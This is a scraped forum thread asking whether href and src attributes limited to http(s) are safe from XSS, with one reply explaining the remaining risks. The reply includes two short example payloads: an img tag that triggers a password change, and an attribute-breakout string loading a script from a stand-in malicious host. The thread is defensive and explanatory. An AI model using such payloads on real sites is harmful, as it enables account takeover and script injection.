: Is this safe? I wonder if href and src attributes on <a> and <img> tags are always safe w.r.t. XSS attacks, if they start with http:// or https://. For example, is it possible
I wonder if href and src attributes on <a> and <img> tags are always safe w.r.t. XSS attacks, if they start with or .
For example, is it possible to append javascript: ... to the href and src attribute in some manner, to execute code?
Disregarding whether or not the destination page is e.g. a pishing site, or the <img src=...> triggers a terribly troublesome HTTP GET request.
Background: I'm processing text with markdown, and then I sanitize the resulting HTML (using Google Caja's JsHtmlSanitizer). Some sample code in Google Caja assumes all hrefs and srcs that start with or are safe -- I wonder if it's safe to use that sample code.
Kind regards,
Kaj-Magnus
More posts by @Radia820
1 Comments
Sorted by latest first Latest Oldest Best
Allowing only the http(s) protocol prevents running javascript, but they can still be used for malicious purposes. Consider the following:
<img src="http://your.website.com/changepassword.php?newpass=hacked123" />
Allowing users to embed content from external websites is always risky, but sometimes inevitable. Making sure your scripts are well protected against XSS like the one above will make your site more solid, if not 100% hacker proof.
EDIT: Here's a pretty comprehensive XSS cheat sheet, though a bit aged. One important point taken from the cheat sheet that I forgot to mention is that you should also escape quotes and/or > signs to prevent URLs such as legiturl.com ><script src="http://mal.icio.us/attack.js">.
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.